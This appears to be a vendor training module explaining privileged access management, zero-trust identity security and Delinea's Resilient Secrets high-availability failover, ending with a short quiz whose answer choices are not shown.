Privileged Access Management
PAM controls, monitors, and audits privileged user accounts โ those with elevated permissions to critical systems โ to prevent insider threats and external breaches.
74%
of breaches involve privileged access misuse
$4.9M
average cost of a data breach (2024)
80%
breach reduction with mature PAM programs
90%
of orgs have unmanaged privileged accounts
Core PAM Concepts
Least Privilege Principle
Users, processes, and applications are granted only the minimum access rights necessary to perform their function. Reduces the attack surface if credentials are compromised.
CORE PRINCIPLE
Credential Vaulting
Privileged credentials are securely stored in an encrypted vault, removing them from desktops, spreadsheets, and shared drives. Automated rotation eliminates stale passwords.
VAULT TECHNOLOGY
Session Management & Recording
All privileged sessions are monitored, logged, and optionally recorded in full. Enables real-time intervention, forensic audit trails, and regulatory compliance.
AUDIT & COMPLIANCE
Just-in-Time Access (JIT)
Privileges are granted on-demand for a limited time window only, then automatically revoked. Eliminates persistent admin accounts โ one of the most exploited attack vectors.
ZERO STANDING PRIVILEGE
Automated Credential Rotation
Passwords and secrets rotate automatically on a scheduled basis or after use, ensuring credentials never become persistent targets for attackers or insider threats.
AUTOMATION
Privileged Account Discovery
Continuously scans the environment to find all privileged accounts โ including orphaned, shared, and service accounts โ bringing shadow IT under controlled governance.
DISCOVERY
Common Privileged Access Threats
| Threat Vector | Description | Risk Level | PAM Mitigation |
|---|---|---|---|
| Credential Theft | Attackers steal admin passwords via phishing, keyloggers, or dark web purchases | CRITICAL | Vault + MFA + rotation removes static credentials |
| Lateral Movement | Compromised low-level accounts used to escalate privileges across the network | CRITICAL | Least privilege prevents privilege escalation paths |
| Insider Threats | Malicious or negligent employees abuse privileged access to exfiltrate data | HIGH | Session recording and behavioral analytics detect anomalies |
| Third-Party Vendor Risk | External contractors or MSPs with broad access that persists beyond engagement | HIGH | JIT access grants temporary, scoped privileges only |
| Service Account Sprawl | Unmanaged machine-to-machine credentials embedded in scripts and applications | MEDIUM | Secrets Manager discovers and rotates service accounts |
| Pass-the-Hash Attacks | Attackers capture password hashes to authenticate without knowing the plaintext | CRITICAL | Frequent rotation invalidates captured hashes rapidly |
PAM Architecture Overview
How PAM Works: Request-to-Access Flow
User / App
Requests Access
Requests Access
โ
PAM Policy Engine
Evaluates Request
Evaluates Request
โ
Credential Vault
Issues Time-limited Cred
Issues Time-limited Cred
โ
Target System
Grants Access
Grants Access
โ
Session Recorder
Logs All Activity
Logs All Activity
PAM Best Practices
๐๏ธ Build a Privilege Discovery Foundation
STEP 1
โ
Before implementing controls, you must know what you have. Run a full discovery scan across Active Directory, LDAP, local admin accounts, cloud IAM, service accounts, and application credentials.
- Inventory all privileged accounts โ including dormant and orphaned accounts
- Map service accounts to their owning applications and business processes
- Identify accounts that share passwords across systems (a critical risk)
- Establish a baseline of "normal" privileged usage patterns for anomaly detection
- Categorize accounts by risk tier to prioritize remediation efforts
๐ Enforce Credential Vaulting & Rotation
STEP 2
โ
Move all privileged credentials into a centralized, encrypted vault. Eliminate hardcoded credentials in scripts, config files, and shared spreadsheets.
- Enforce password complexity and uniqueness per system
- Configure automated rotation โ at least every 30โ90 days, or after every use for highly sensitive systems
- Use check-out / check-in workflows: credentials are only issued for the duration of a session
- Enable emergency break-glass access with mandatory audit triggers
- Integrate vault with CI/CD pipelines to eliminate secrets in code repositories
๐ฑ Implement Multi-Factor Authentication
STEP 3
โ
MFA is non-negotiable for all privileged access. A stolen password alone should never be sufficient to access critical systems.
- Require MFA at vault login and for each privileged session checkout
- Use phishing-resistant factors: hardware tokens (FIDO2/WebAuthn), certificate-based auth
- Apply step-up authentication for high-risk operations like domain admin access
- Integrate with your identity provider (Okta, Azure AD, Ping) for unified MFA policies
- Never accept SMS OTP as a sole factor for privileged access
๐น Monitor, Record & Audit All Sessions
STEP 4
โ
Every privileged session should be visible to your security team. Session recording is both a deterrent and a forensic tool.
- Record all RDP, SSH, and web console sessions in full video and keylogger format
- Implement real-time session monitoring with alerts for suspicious commands
- Enable automated session termination when policy violations are detected
- Forward session logs to your SIEM for correlation with other security events
- Retain session recordings for audit and compliance (often 12โ24 months minimum)
Compliance Note: PAM capabilities are mandated or strongly recommended by PCI-DSS, SOX, HIPAA, NIST 800-53, ISO 27001, and most cyber insurance underwriters. A robust PAM program significantly reduces audit scope and premium costs.
Identity Security
Identity has become the new security perimeter. Every user, device, workload, and service that accesses your environment must be treated as a potential attack vector โ and verified accordingly.
The Perimeter is Dead. Traditional network-based security assumed internal users were trusted. In modern cloud, hybrid, and remote environments, identity is the only consistent control plane. Every access request must be authenticated, authorized, and continuously verified.
Zero Trust Identity Architecture
Never Trust, Always Verify
No user or device is inherently trusted based on network location. Every access request must be authenticated and authorized in context, regardless of whether it originates inside or outside the perimeter.
ZERO TRUST
Continuous Verification
Authentication is not a one-time event at login. Continuous behavioral analytics and risk signals re-evaluate trust throughout a session, triggering step-up auth when anomalies are detected.
ADAPTIVE AUTH
Non-Human Identities (NHIs)
Service accounts, API keys, certificates, and CI/CD pipelines represent the majority of modern identities. NHIs are often over-privileged, long-lived, and poorly managed โ a growing attack surface.
MACHINE IDENTITY
Federated Identity & SSO
Single Sign-On with federated identity standards (SAML, OIDC, OAuth2) reduces password sprawl and provides a central enforcement point for MFA and conditional access policies.
FEDERATION
Identity Governance & IGA
IGA solutions manage the full identity lifecycle โ provisioning, role management, access certifications, and deprovisioning. Ensures access is appropriate and revoked promptly when no longer needed.
GOVERNANCE
Privileged Identity Management
PIM extends PAM to cloud-native environments โ governing Azure AD privileged roles, AWS IAM, and GCP service accounts with the same rigor applied to on-premises admin accounts.
CLOUD IAM
The Identity Attack Surface
๐ณ๏ธ Shadow IT & Rogue Accounts
โ
Employees create accounts in SaaS tools, cloud platforms, and development environments outside of IT oversight. These shadow accounts carry full risk but zero visibility.
- Use Cloud Access Security Brokers (CASB) to discover unsanctioned cloud usage
- Integrate identity discovery with HR systems to catch joiners/movers/leavers automatically
- Enforce SSO as a pre-condition for new SaaS tool approvals
- Conduct quarterly access reviews and user access certifications
๐ API Keys & Secret Sprawl
โ
Developers embed API keys, database passwords, and tokens directly in source code, environment files, and configuration repositories. These secrets proliferate rapidly and are rarely rotated.
- Scan code repositories (GitHub, GitLab, Bitbucket) continuously for exposed secrets
- Implement a Secrets Manager as the authoritative source for all application credentials
- Block commits containing secrets with pre-commit hooks and CI/CD scanning
- Enforce dynamic secrets that expire after use for database and cloud credentials
- Audit access to secrets vaults and alert on unusual retrieval patterns
๐ค Third-Party & Supply Chain Identity Risk
โ
Vendors, contractors, and software supply chains represent a significant and growing identity risk. The SolarWinds and Okta breach demonstrated how third-party identity compromise cascades into customers.
- Enforce vendor access through a privileged remote access solution โ never VPN or direct credentials
- Apply strict JIT access: vendor accounts are activated only during maintenance windows
- Require MFA for all third-party identities with no exceptions
- Monitor and record all vendor sessions in real time
- Periodically review and certify all third-party access entitlements
๐ค Workload & Machine Identity Security
โ
Containers, microservices, serverless functions, and CI/CD pipelines all need identities. These non-human identities outnumber human ones by 45:1 in many enterprises โ and are often completely unmanaged.
- Issue short-lived X.509 certificates to workloads via an internal PKI or SPIFFE/SPIRE
- Use IAM roles (not static access keys) for cloud workload authentication
- Rotate secrets used by pipelines at every run โ never cache credentials across jobs
- Apply network policies to limit lateral movement between workloads
- Decommission orphaned service accounts when workloads are retired
Identity Security Maturity Model
LEVEL 1
Reactive
Passwords managed manually. No MFA enforcement. Privileged accounts shared. Breaches discovered after-the-fact through external notification.
LEVEL 2
Managed
Centralized directory. Basic PAM deployed for some systems. MFA for remote access. Quarterly access reviews. Incident response plans exist.
LEVEL 3
Proactive
Full vault coverage. JIT access deployed. Session recording active. IGA integrated with HR. SIEM correlated with PAM events. Automated deprovisioning.
LEVEL 4
Optimized
Zero Standing Privilege enforced. Adaptive MFA with behavioral analytics. NHI identity lifecycle fully automated. Continuous compliance dashboards. Secrets managed with DR protection.
Delinea's Role: Delinea's platform โ including Secret Server, Privilege Manager, and DevOps Secrets Vault โ provides the technical controls to advance your organization from Level 1 to Level 4, with Resilient Secrets ensuring your identity security posture remains intact even during disasters.
Resilient Secrets & Disaster Recovery
Delinea Resilient Secrets delivers enterprise-grade high availability, geographic redundancy, and automated failover for your secrets management infrastructure โ so a disaster never becomes a security crisis.
The DR Problem Resilient Secrets Solves
โ ๏ธ Without Resilient Secrets
- Vault outage = all privileged access halted, operations grind to a stop
- Single point of failure in your most critical security control
- Manual recovery from backup takes hours or days
- Risk of credential loss and data integrity issues during restore
- Ransomware can encrypt vault database, blocking all credential access
- DR testing is complex, disruptive, and rarely performed
- RTO measured in hours; RPO potentially hours of data loss
โ
With Resilient Secrets
- Automatic failover to a hot standby โ transparent to end users
- Active-passive or active-active replication across sites/regions
- Recovery in seconds to minutes, not hours
- Synchronous or asynchronous replication preserves data integrity
- Immutable backup snapshots protect against ransomware encryption
- Non-disruptive DR testing validates recoverability at any time
- RTO measured in seconds; near-zero RPO with synchronous replication
Key Features & Capabilities
Automated Failover
When the primary node becomes unavailable, Resilient Secrets automatically promotes the standby node without manual intervention. Vault operations continue seamlessly with no interruption to privileged access workflows.
HIGH AVAILABILITY
Geographic Redundancy
Deploy standby nodes in separate data centers, availability zones, or cloud regions. Protects against site-level failures including natural disasters, power outages, and regional cloud provider incidents.
GEO REDUNDANCY
Real-Time Replication
All vault writes โ new secrets, rotations, access policy changes โ are replicated to standby nodes in real time. Synchronous replication ensures zero data loss (RPO = 0) for the most demanding RTO/RPO requirements.
REPLICATION
Non-Disruptive DR Testing
Organizations can test their disaster recovery plan without impacting production operations. Snapshot-based testing environments allow teams to validate recovery procedures on a regular cadence with confidence.
DR TESTING
Immutable Snapshot Backups
Point-in-time snapshots of the vault database are stored in immutable storage, protecting against ransomware, accidental deletion, and data corruption. Granular restore allows recovery to a precise moment in time.
RANSOMWARE PROTECTION
Health Monitoring & Alerting
Continuous health checks monitor replication lag, node availability, and certificate validity. Automated alerts notify operations teams of degraded redundancy before a failure event occurs.
OBSERVABILITY
Disaster Recovery Deployment Models
๐ข Active-Passive (Hot Standby)
MOST COMMON
โ
Architecture: One primary node handles all read/write operations. One or more passive standby nodes receive continuous replication and are ready to take over instantly.
- Failover is automatic โ triggered by health check failure on the primary node
- Standby node is fully synchronized and operational within seconds of promotion
- Suitable for most enterprise deployments with a secondary data center or cloud region
- Lower infrastructure cost than active-active while providing near-zero RTO
- Supports planned failover for maintenance windows with zero user impact
โก Active-Active (Multi-Primary)
HIGHEST AVAILABILITY
โ
Architecture: Multiple nodes handle read and write operations simultaneously. Traffic is load-balanced across all nodes. Any node failure is transparent to users.
- Zero single point of failure โ the cluster continues operating even if multiple nodes fail
- Load distribution improves performance under high-concurrency workloads
- Ideal for global enterprises requiring vault access across multiple geographic regions
- Supports zero-downtime upgrades via rolling node updates
- Requires careful conflict resolution for concurrent writes โ Delinea manages this automatically
โ๏ธ Cloud-Native Resilience
CLOUD DEPLOYMENTS
โ
Architecture: Delinea's cloud-hosted Secret Server leverages native cloud HA capabilities โ multi-AZ deployments on AWS, Azure, or GCP with managed database replication.
- Leverage cloud-provider SLAs for 99.99% availability at the infrastructure layer
- Automatic database failover with AWS RDS Multi-AZ or Azure SQL HA
- Storage replication across availability zones for vault data and encryption keys
- Kubernetes-native deployments with pod anti-affinity rules prevent co-location failures
- Cross-region replication for enterprise-class geographic DR with single-pane management
How Disaster Recovery Works: Step by Step
1. Continuous Replication & Health Monitoring
All vault writes are replicated synchronously or asynchronously to standby nodes. Health check agents poll primary node availability every few seconds. Replication lag is monitored and alerted if thresholds are exceeded.
2. Failure Detection
When the primary node fails health checks (unresponsive, network partition, hardware failure), the cluster management layer detects the failure and initiates the failover decision after a configurable timeout to prevent split-brain scenarios.
3. Automatic Standby Promotion
The most current standby node is automatically promoted to primary. The node applies any pending replication transactions to reach a consistent state, then begins accepting read/write operations. This process typically completes in under 30 seconds.
4. DNS / Load Balancer Cutover
The vault endpoint DNS record or load balancer target is updated to point to the newly promoted primary node. Client connections are transparently rerouted. Users experience a brief connection reset but do not need to change configuration or re-authenticate.
5. Operations Continue
All credential checkouts, rotations, session launches, and API calls resume normally on the new primary node. Security teams are alerted to the failover event with full details for incident tracking and post-mortem analysis.
6. Recovery & Rebalancing
Once the original primary node is repaired, it re-joins the cluster as a standby node, resyncs with the current primary, and restores full redundancy. Operations teams can optionally fail back to the original node during a maintenance window.
Benefits Summary
<30s
Automatic failover RTO
~0
Data loss (RPO) with sync replication
99.99%
Target vault availability SLA
100%
Transparent failover โ no user action
Why This Matters for Security: Your PAM vault is the master key to your entire privileged access infrastructure. If the vault is unavailable โ even for minutes โ privileged users may resort to hardcoded credentials, shared passwords, or bypassing controls entirely. Resilient Secrets ensures your security controls remain intact during every type of failure event.
Knowledge Check
Test your understanding of PAM, Identity Security, and Delinea Resilient Secrets. Select the best answer for each question, then click "Submit Answers" to see your results.
PAM & Identity Security Assessment
Score: 0 / 0
QUESTION 01 / 08
What is the primary principle that PAM enforces to minimize the impact of compromised credentials?
QUESTION 02 / 08
Just-in-Time (JIT) access is designed to eliminate which major security risk?
QUESTION 03 / 08
In a Zero Trust security model, what is the correct stance toward users accessing resources from inside the corporate network?
QUESTION 04 / 08
Non-Human Identities (NHIs) refer to which of the following?
QUESTION 05 / 08
What does Delinea Resilient Secrets primarily protect against?
QUESTION 06 / 08
In Active-Passive replication, what happens when the primary vault node fails?
QUESTION 07 / 08
Which of the following BEST describes RPO (Recovery Point Objective)?
QUESTION 08 / 08
Why is vault availability critical specifically from a security perspective during a disaster?
๐ Complete All Modules
Review PAM Fundamentals, Identity Security, and Resilient Secrets to build a complete understanding of Delinea's privileged access security platform.